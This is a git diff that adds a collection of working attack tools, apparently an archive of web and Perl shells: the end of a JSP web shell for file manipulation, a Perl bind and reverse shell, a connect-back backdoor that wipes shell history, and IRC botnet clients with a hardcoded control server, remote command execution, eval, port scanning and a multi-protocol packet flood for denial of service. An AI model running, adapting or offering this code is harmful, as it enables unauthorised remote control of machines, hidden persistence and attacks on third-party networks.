+        return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\">Delete</a> <a href=\"javascript:reName('"+folderReplace(file)+"')\">Rename</a> <a href=\"javascript:setDate('"+folderReplace(file)+"')\">setDate</a> <a href=\"javascript:copyFile('"+folderReplace(file)+"')\">Copy</a> <a href=\"javascript:editFile('"+folderReplace(file)+"')\">Edit</a> <a href=\"javascript:downFile('"+folderReplace(file)+"');\">Down</a>";
+}
+String getSize(long size){
+    if(size>=1024*1024*1024){
+        return new Long(size/1073741824L)+"G";
+    }else if(size>=1024*1024){
+        return new Long(size/1048576L)+"M";
+    }else if(size>=1024){
+        return new Long(size/1024)+"K";
+    }else
+        return size+"B";
+}
+String ico(int num){//ico
+    return "<font face=wingdings size=3>&#"+num+"</font>";
+}
+String htmlEntity(String htmlCode){//html uncode
+ htmlCode=htmlCode.replaceAll("&","&amp;");
+ htmlCode=htmlCode.replaceAll("<","&lt;");
+ return htmlCode.replaceAll(">","&gt;");
+}
+%>
\ No newline at end of file
diff --git a/xakep-shells/PERL/Asmodeus v0.1.pl.txt b/xakep-shells/PERL/Asmodeus v0.1.pl.txt
new file mode 100644
index 0000000..600036d
--- /dev/null
+++ b/xakep-shells/PERL/Asmodeus v0.1.pl.txt	
@@ -0,0 +1,131 @@
+#!/usr/bin/perl
+
+#
+
+#   Asmodeus v0.1
+
+#   Perl Remote Shell
+
+#   by phuket
+
+#   www.smoking-gnu.org
+
+#
+
+#   (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
+
+#   
+
+
+
+#   perl asmodeus.pl client 6666 127.0.0.1
+
+#   perl asmodeus.pl server 6666
+
+#
+
+
+
+
+
+use Socket;
+
+
+
+$cs=$ARGV[0];
+
+$port=$ARGV[1];
+
+$host=$ARGV[2];
+
+
+
+if ($cs eq 'client') {&client}
+
+elsif ($cs eq 'server') {&server}
+
+
+
+
+
+
+
+
+
+sub client{
+
+socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
+
+$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
+
+$paddr=sockaddr_in("$port", $internet_addr);
+
+connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
+
+open(STDIN, ">&TO_SERVER");
+
+open(STDOUT, ">&TO_SERVER");
+
+open(STDERR, ">&TO_SERVER");
+
+print "Asmodeus Perl Remote Shell\n";
+
+system(date);
+
+system("/bin/sh");
+
+close(TO_SERVER);
+
+}
+
+
+
+
+
+
+
+
+
+
+
+sub server{
+
+$proto=getprotobyname('tcp');
+
+$0="asm";
+
+$system='/bin/sh';
+
+socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
+
+setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
+
+bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
+
+listen(SERVER, SOMAXCONN) or die "listen: $!";
+
+for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
+
+  open(STDIN, ">&CLIENT");
+
+  open(STDOUT, ">&CLIENT");
+
+  open(STDERR, ">&CLIENT");
+
+  print "Asmodeus Perl Remote Shell\n";
+
+  system(date);
+
+  system("/bin/sh");
+
+  close(STDIN);
+
+  close(STDOUT);
+
+  close(STDERR);
+
+  return;
+
+}
+
+}
\ No newline at end of file
diff --git a/xakep-shells/PERL/connectback2.pl.txt b/xakep-shells/PERL/connectback2.pl.txt
new file mode 100644
index 0000000..f4571e6
--- /dev/null
+++ b/xakep-shells/PERL/connectback2.pl.txt
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use IO::Socket;
+#WwW.CoM Security Hackers          
+#coded bY: MasterKid
+#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                          
+#Email: muzicteam2006@yahoo.com
+#
+#kid@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
+#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system	= '/bin/sh';
+$ARGC=@ARGV; 
+print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n"; 
+if ($ARGC!=2) { 
+   print "Usage: $0 [Host] [Port] \n\n"; 
+   die "Ex: $0 127.0.0.1 2121 \n"; 
+} 
+use Socket; 
+use FileHandle; 
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n"; 
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush(); 
+open(STDIN, ">&SOCKET"); 
+open(STDOUT,">&SOCKET"); 
+open(STDERR,">&SOCKET"); 
+print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--  \n\n"; 
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
+system($system);
+#EOF
\ No newline at end of file
diff --git a/xakep-shells/PERL/perlbot.pl.txt b/xakep-shells/PERL/perlbot.pl.txt
new file mode 100644
index 0000000..1c590e0
--- /dev/null
+++ b/xakep-shells/PERL/perlbot.pl.txt
@@ -0,0 +1,687 @@
+#!/usr/bin/perl
+# ========================= 
+# Perl Bot by LKY 
+# Obrigado a italo, false e Ragde :D
+# ========================= 
+
+# Componentes
+use IO::Socket;
+use Socket;
+use IO::Select;
+
+# Configura??es
+my $servidor        ='208.98.16.20';
+my $porta           ='9002';
+my $nick            =DDos;
+my $ircname         = 'DDos';
+my $realname        = "DDos";
+my @canais=("#SSH");
+my @adms=("Kelserific","Puna","nod32");
+#my $processo = '/bin/bash';    #se comantar nao mostra o PID
+
+#Flood Control
+my $linas_max=6;
+my $sleep=3;
+
+#Acesso a Shel - 1 ON 0 OFF
+my $secv = 1;
+
+##############################
+my $VERSAO = '0.1';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+chdir("/tmp/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+#diretorio,config do server e pid
+
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+#######
+#Bot em si!
+#######
+
+$sel_cliente = new IO::Select();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = new IO::Socket::INET(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION LKY bot-$VERSAO\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!hdr)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!hdr" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","53","80","110","143","6667","59","7000","110","65535","0");
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); 
+             }
+           }
+           if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+            
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :4STATUS - LKY");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Tempo:1 $dtime"."s");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total pacotes:1 ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total bytes:1 ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14M?dia de envio:4 ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+
+
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^voice/) {
+      voice("$printl", "$kem") if $case eq "voice";
+      $oarg = substr($case, 6);
+      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^devoice/) {
+      devoice("$printl", "$kem") if $case eq "devoice";
+      $oarg = substr($case, 8);
+      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^invite\s+(\S+) (.*)/) {
+      invite("$1", "$2");
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+sub shell {
+  return unless $secv;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diert?? inexistente!");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'B' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = 'sendcon';
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq 'sendcon') {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+ 
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = 'send';
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else { 
+    return(0); 
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = 'get';
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+    my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+}
+ 
diff --git a/xakep-shells/PERL/shellbot.pl.txt b/xakep-shells/PERL/shellbot.pl.txt
new file mode 100644
index 0000000..28904a0
--- /dev/null
+++ b/xakep-shells/PERL/shellbot.pl.txt
@@ -0,0 +1,704 @@
+#!/usr/bin/perl#
+###############################################################################################
+#  ShellBOT - PacktsGr0up                                                                     #                              #                    ____               _          _                                          #
+#                   |  _ \  __ _   ___ | | __ ___ | |_  ___                                   #
+#                   | |_) |/ _` | / __|| |/ // _ \| __|/ __|                                  #
+#                   |  __/| (_| || (__ |   <|  __/| |_ \__ \         m?e te amo!!                          #
+#                   |_|   _\__,_| \___||_|\_\\___| \__||___/                                  #
+#                        / ___| _ __  ___   _   _  _ __                                       #
+#                       | |  _ | '__|/ _ \ | | | || '_ \                                      #
+#                       | |_| || |  | (_) || |_| || |_) |                                     #
+#                        \____||_|   \___/  \__,_|| .__/                                      #
+#                                                 |_|                                         #
+#                                                                                             #
+#                Staff: Danilo                                                                #
+#                                                                                             #
+#adm: Danilo                                                                                  #
+###################################### CONFIGURACAO ###########################################
+my $processo = '/usr/local/apache/bin/httpd -DSSL';                       # Nome do processo que vai aparece no ps       #
+#----------------------------------------------################################################
+my $linas_max='5';                             # Evita o flood :) depois de X linhas          #
+#----------------------------------------------################################################
+my $sleep='10';                                 # ele dorme X segundos                         #
+########################################## IRC ################################################            
+my @adms=("NOD32"); # Nick do administrador                                                     #
+#----------------------------------------------################################################
+my @canais=("#SSH :2007");                 # Caso haja senha ("#hdr :hax0r")                      #
+#----------------------------------------------################################################
+my $nick='SSH-';	                       # Nick do bot. Caso esteja em uso vai aparecer #
+                                               # aparecer com numero radonamico no final      #
+#----------------------------------------------################################################
+my $ircname = 'SSH';                          # User ID                                        #
+#----------------------------------------------################################################
+chop (my $realname = `id`);                 # Full Name                                    #
+#----------------------------------------------################################################
+$servidor='208.98.16.20'  unless $servidor; # Servidor de irc que vai ser usado                #                                                                                  # caso n?o seja especificado no argumento  #                       #----------------------------------------------################################################
+my $porta='9001';                              # Porta do servidor de irc                     #
+################ ACESSO A SHELL ###############################################################
+my $secv = 1;	                               # 1/0 pra habilita/desabilita acesso a shell   #
+###############################################################################################
+
+my $VERSAO = '0.2';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+use IO::Socket;
